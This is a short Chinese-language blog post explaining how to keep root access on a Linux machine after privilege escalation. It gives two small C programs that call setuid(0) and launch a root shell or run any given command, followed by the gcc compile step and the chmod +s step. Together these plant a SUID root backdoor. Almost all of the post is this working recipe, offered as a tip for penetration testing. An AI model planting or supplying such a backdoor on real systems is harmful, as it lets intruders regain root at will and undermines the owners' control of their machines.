Linux 获取 ROOT 权限后的维持小技巧 作者: admin 时间: 2020-02-25 分类: 随便写写 一个小技巧,做个笔记吧 <!--more--> 当我们渗透的时候,从低权用户拿到 ROOT 权限了,一旦关闭了 Terminal 窗口 ROOT 权限就没了。为了解决这个问题,我们可以利用 Linux 的 SUID 技巧(人话就是S权限的二进制文件......) 代码: ``` #include <stdio.h> int main() { setuid(0); system("/bin/bash"); return 0; } ``` or ``` #include <stdio.h> int main(int argc,char* argv[]) { setuid(0); system(argv[1]); return 0; } ``` 拿到 ROOT 权限之后将上面的代码编译成执行程序 ``` gcc -o rt code.c ``` 然后赋予 S 权限(S权限自己百度) ``` chmod +s rt ``` 然后愉快的在 ROOT 和非 ROOT 环境来回切换吧 :D 标签: none